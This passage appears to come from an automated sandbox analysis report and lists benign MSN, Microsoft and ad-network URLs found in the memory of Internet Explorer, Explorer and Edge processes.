          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6A6000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation=ItemSea
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://z.about.com/m/a08.ico9D
          Source: iexplore.exe, 0000001D.00000002.4189410566.0000000009890000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://acdn.adnxs.com/
          Source: iexplore.exe, 0000001D.00000002.4189410566.0000000009890000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://acdn.adnxs.com/.
          Source: iexplore.exe, 0000001D.00000002.4189410566.0000000009890000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://acdn.adnxs.com/C
          Source: iexplore.exe, 0000001D.00000002.4189410566.0000000009890000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4177235933.0000000006D60000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://acdn.adnxs.com/ast/ast.js
          Source: iexplore.exe, 0000001D.00000002.4177235933.0000000006DB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://acdn.adnxs.com/ast/ast.js?;
          Source: iexplore.exe, 0000001D.00000002.4222761580.000000000AC6F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://acdn.adnxs.com/ast/ast.jsX
          Source: iexplore.exe, 0000001D.00000003.2485342541.000000000F790000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4249745118.000000000F790000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://acdn.adnxs.com/ast/ast.jsl
          Source: iexplore.exe, 0000001D.00000002.4189410566.0000000009890000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://acdn.adnxs.com/ast/ast.jsn_
          Source: explorer.exe, 00000005.00000003.3105602905.000000000CA8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4201131372.000000000CA96000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167076882.000001BA5D2A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
          Source: explorer.exe, 00000005.00000000.1769871733.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: iexplore.exe, 0000001D.00000002.4249745118.000000000F790000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?
          Source: iexplore.exe, 0000001D.00000003.2485541600.000000000F794000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485818011.0000000009A5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE
          Source: explorer.exe, 00000005.00000000.1760442798.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
          Source: explorer.exe, 00000005.00000000.1760442798.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D446000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000005.00000002.4201832367.000000000CB4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3109920204.000000000CB4C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3109424058.000000000CB14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105602905.000000000CB14000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSA
          Source: explorer.exe, 00000005.00000002.4201832367.000000000CB4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3109920204.000000000CB4C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3109424058.000000000CB14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105602905.000000000CB14000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSAU
          Source: explorer.exe, 00000005.00000002.4201832367.000000000CB4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3109920204.000000000CB4C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3109424058.000000000CB14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105602905.000000000CB14000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSG~
          Source: explorer.exe, 00000005.00000002.4201832367.000000000CB4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3109920204.000000000CB4C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3109424058.000000000CB14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105602905.000000000CB14000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSMmfa
          Source: explorer.exe, 00000005.00000002.4184525371.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1766227290.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3497000598.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000005.00000002.4184525371.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1766227290.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3497000598.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
          Source: explorer.exe, 00000005.00000000.1757634242.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1758456688.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4160128324.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4157091607.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000005.00000003.3497000598.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1766227290.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4184525371.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
          Source: explorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
          Source: iexplore.exe, 0000001D.00000002.4236983452.000000000CF9D000.00000004.00000001.00020000.00000000.sdmp, me[1].json.29.drString found in binary or memory: https://api.msn.com:443/msn/Feed/me?$top=32&delta=True&session=7ff00732-2da7-4ed1-b84f-999081524eed&
          Source: explorer.exe, 00000005.00000002.4184525371.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1766227290.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3497000598.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: msedge.exe, 00000021.00000002.2247365108.00000224084BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: msedge.exe, 00000023.00000002.2327706162.0000015D322A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comc
          Source: explorer.exe, 00000005.00000003.3497000598.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1766227290.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4184525371.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
          Source: iexplore.exe, 0000000E.00000002.4160624814.000000000317A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.c
          Source: iexplore.exe, 0000000E.00000002.4202564168.000000000A832000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000003.2171894799.000000000A82A000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000003.2171975111.000000000A831000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4221164913.000000000ABA1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.cn
          Source: iexplore.exe, 0000000E.00000002.4200849827.000000000A7CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.cn/resolver/api/resolve/
          Source: iexplore.exe, 0000001D.00000002.4221164913.000000000ABA1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.cnt
          Source: iexplore.exe, 0000001D.00000002.4212877567.000000000A700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com
          Source: iexplore.exe, 0000000E.00000002.4175868407.000000000642C000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4177235933.0000000006D8A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/
          Source: iexplore.exe, 0000000E.00000002.4175868407.000000000642C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/G
          Source: iexplore.exe, 0000001D.00000002.4177235933.0000000006D8A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/V
          Source: iexplore.exe, 0000001D.00000002.4177235933.0000000006DB0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4171805100.00000000062D1000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4196973895.0000000009E2D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4193314739.0000000009BEC000.00000004.00000001.00020000.00000000.sdmp, 1T6N7XO9.htm.29.drString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/common.201243b1e0c575a1f91b.js
          Source: iexplore.exe, 0000001D.00000002.4177235933.0000000006DB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/common.201243b1e0c575a1f91b.js$
          Source: iexplore.exe, 0000000E.00000002.4179072726.00000000069D6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/common.201243b1e0c575a1f91b.js5
          Source: iexplore.exe, 0000000E.00000002.4171695825.000000000635E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/common.201243b1e0c575a1f91b.js=
          Source: iexplore.exe, 0000001D.00000002.4177235933.0000000006DB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/common.201243b1e0c575a1f91b.jsF
          Source: iexplore.exe, 0000000E.00000002.4179072726.00000000069D6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/common.201243b1e0c575a1f91b.jsU-
          Source: iexplore.exe, 0000000E.00000002.4175868407.00000000063FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/common.201243b1e0c575a1f91b.jseof
          Source: iexplore.exe, 0000000E.00000002.4179072726.00000000069D6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/common.201243b1e0c575a1f91b.jsm
          Source: iexplore.exe, 0000000E.00000002.4175868407.00000000063FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/common.201243b1e0c575a1f91b.jss
          Source: iexplore.exe, 0000001D.00000002.4177235933.0000000006DB0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4178783359.0000000006E0B000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4171805100.00000000062D1000.00000004.00000001.00020000.00000000.sdmp, 1T6N7XO9.htm.29.drString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/experience.a924de0fd91e364ec453.js
          Source: iexplore.exe, 0000000E.00000002.4175868407.00000000063FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/experience.a924de0fd91e364ec453.js0
          Source: iexplore.exe, 0000001D.00000002.4196973895.0000000009E2D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/experience.a924de0fd91e364ec453.js16400
          Source: iexplore.exe, 0000000E.00000002.4193507861.000000000A03D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/experience.a924de0fd91e364ec453.js16400L
          Source: iexplore.exe, 0000001D.00000002.4178783359.0000000006E0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/experience.a924de0fd91e364ec453.jsA#jH
          Source: iexplore.exe, 0000000E.00000002.4171695825.000000000635E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/experience.a924de0fd91e364ec453.jsC
          Source: iexplore.exe, 0000000E.00000002.4160624814.000000000318F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/experience.a924de0fd91e364ec453.jsG
          Source: iexplore.exe, 0000001D.00000002.4178783359.0000000006E0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/experience.a924de0fd91e364ec453.jsK
          Source: iexplore.exe, 0000001D.00000002.4178783359.0000000006E0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/experience.a924de0fd91e364ec453.jsU
          Source: iexplore.exe, 0000000E.00000002.4171695825.000000000635E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/experience.a924de0fd91e364ec453.jsZ
          Source: iexplore.exe, 0000001D.00000002.4177235933.0000000006DB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/experience.a924de0fd91e364ec453.jsb3PK$
          Source: iexplore.exe, 0000000E.00000002.4171695825.000000000635E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/experience.a924de0fd91e364ec453.jsh
          Source: iexplore.exe, 0000000E.00000002.4175868407.00000000063FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/experience.a924de0fd91e364ec453.jsu
          Source: iexplore.exe, 0000001D.00000002.4177235933.0000000006DB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/experience.a924de0fd91e364ec453.jsy3
          Source: iexplore.exe, 0000000E.00000002.4175868407.00000000063FC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4178783359.0000000006E8C000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4177235933.0000000006DB0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4171805100.00000000062D1000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4196973895.0000000009E2D000.00000004.00000001.00020000.00000000.sdmp, 1T6N7XO9.htm.29.drString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/microsoft.afc9b4502f5cf6f88cca.js
          Source: iexplore.exe, 0000001D.00000002.4177235933.0000000006DB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/microsoft.afc9b4502f5cf6f88cca.js&6
          Source: iexplore.exe, 0000000E.00000002.4175868407.00000000063FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/microsoft.afc9b4502f5cf6f88cca.jsI
          Source: iexplore.exe, 0000001D.00000002.4177235933.0000000006DB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/microsoft.afc9b4502f5cf6f88cca.jsY6
          Source: iexplore.exe, 0000000E.00000002.4171695825.000000000635E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/microsoft.afc9b4502f5cf6f88cca.jsqAY
          Source: iexplore.exe, 0000000E.00000002.4175868407.00000000063FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/microsoft.afc9b4502f5cf6f88cca.jstarget:
          Source: iexplore.exe, 0000001D.00000002.4177235933.0000000006DB0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4171805100.00000000062D1000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4196973895.0000000009E2D000.00000004.00000001.00020000.00000000.sdmp, 1T6N7XO9.htm.29.drString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/vendors.79af82f3c5b028c7ea81.js
          Source: iexplore.exe, 0000000E.00000002.4175868407.00000000063FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/vendors.79af82f3c5b028c7ea81.js664
          Source: iexplore.exe, 0000000E.00000002.4175868407.000000000642C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/vendors.79af82f3c5b028c7ea81.jsC:
          Source: iexplore.exe, 0000000E.00000002.4179072726.00000000069D6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/vendors.79af82f3c5b028c7ea81.jsE
          Source: iexplore.exe, 0000001D.00000002.4177235933.0000000006DB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/vendors.79af82f3c5b028c7ea81.jsV
          Source: iexplore.exe, 0000000E.00000002.4179072726.00000000069D6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/vendors.79af82f3c5b028c7ea81.jsm
          Source: iexplore.exe, 0000000E.00000002.4175868407.00000000063FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/vendors.79af82f3c5b028c7ea81.jso
          Source: iexplore.exe, 0000000E.00000002.4175868407.00000000063FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/vendors.79af82f3c5b028c7ea81.jsrot
          Source: iexplore.exe, 0000000E.00000002.4179072726.00000000069D6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/vendors.79af82f3c5b028c7ea81.jsu
          Source: iexplore.exe, 0000000E.00000002.4217712097.000000000B087000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4213625525.000000000AED1000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4178546835.0000000006930000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4201829277.000000000A804000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4215365521.000000000AF50000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4215906165.000000000A800000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4212877567.000000000A70B000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4177235933.0000000006D60000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/config/v1/
          Source: iexplore.exe, 0000000E.00000002.4184443900.0000000006AF7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4171805100.0000000006327000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4178783359.0000000006E7B000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4177235933.0000000006DC2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/config/v1/&ocid=iehp&os=windows&locale=
          Source: iexplore.exe, 0000000E.00000002.4160624814.000000000313F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/config/v1/&quot;
          Source: iexplore.exe, 0000001D.00000002.4237273479.000000000CFD1000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4201659657.000000000A150000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/content/v1/cms/api/amp/Document/
          Source: iexplore.exe, 0000001D.00000002.4178783359.0000000006E0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/content/v1/cms/api/amp/Document/BBI4MeJ
          Source: iexplore.exe, 0000001D.00000002.4160602763.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/content/v1/cms/api/amp/Document/BBI4MeJ?format=json
          Source: iexplore.exe, 0000001D.00000002.4160602763.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/content/v1/cms/api/amp/Document/BBI4MeJ?format=json:Y
          Source: iexplore.exe, 0000001D.00000002.4160602763.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/content/v1/cms/api/amp/Document/BBI4MeJ?format=jsonNX
          Source: iexplore.exe, 0000001D.00000002.4160602763.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/content/v1/cms/api/amp/Document/BBI4MeJ?format=jsonZX
          Source: iexplore.exe, 0000001D.00000002.4160602763.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/content/v1/cms/api/amp/Document/BBI4MeJ?format=jsonbY
          Source: iexplore.exe, 0000001D.00000002.4178783359.0000000006E0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/content/v1/cms/api/amp/Document/BBI4MeJ?format=jsone0fd91e364ec453.js
          Source: iexplore.exe, 0000001D.00000002.4160602763.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/content/v1/cms/api/amp/Document/BBI4MeJ?format=jsonfX
          Source: iexplore.exe, 0000001D.00000002.4160602763.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/content/v1/cms/api/amp/Document/BBI4MeJ?format=json~Y
          Source: iexplore.exe, 0000001D.00000002.4189410566.0000000009890000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/service/MSN/Feed/me?$top=32&DisableTypeSerialization=true&activityId=7FF05383
          Source: iexplore.exe, 0000001D.00000002.4221164913.000000000ABA1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/
          Source: explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
          Source: iexplore.exe, 0000000E.00000002.4225595480.000000000B858000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4179072726.00000000069D6000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4171695825.000000000635E000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4171695825.0000000006340000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4210548565.000000000ADEC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4220999092.000000000AB8D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/Icon.png
          Source: iexplore.exe, 0000000E.00000002.4179072726.00000000069D6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/Icon.png3%
          Source: iexplore.exe, 0000001D.00000002.4171805100.0000000006280000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/Icon.pngY_
          Source: iexplore.exe, 0000001D.00000002.4189410566.0000000009890000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/Icon.pngZ
          Source: iexplore.exe, 0000001D.00000002.4189410566.0000000009890000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/Icon.pngd
          Source: iexplore.exe, 0000000E.00000002.4179072726.00000000069D6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/Icon.pngo$
          Source: iexplore.exe, 0000001D.00000002.4160602763.0000000000880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/Icon.pngv
          Source: iexplore.exe, 0000001D.00000002.4160602763.0000000000880000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4220999092.000000000AB8D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/desktop-shape.png
          Source: iexplore.exe, 0000000E.00000002.4171695825.00000000063C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/desktop-shape.pngQ
          Source: iexplore.exe, 0000000E.00000002.4171695825.00000000063C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/desktop-shape.pngz
          Source: iexplore.exe, 0000000E.00000002.4171695825.00000000063C5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4171695825.000000000635E000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4179072726.0000000006A39000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4171695825.0000000006340000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4160624814.00000000030D7000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4190391744.0000000009510000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4171805100.0000000006280000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4232342849.000000000B638000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4160602763.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4189410566.0000000009890000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/ie-image.png
          Source: iexplore.exe, 0000000E.00000002.4171695825.00000000063C5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4189410566.0000000009890000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/ie-image.png)
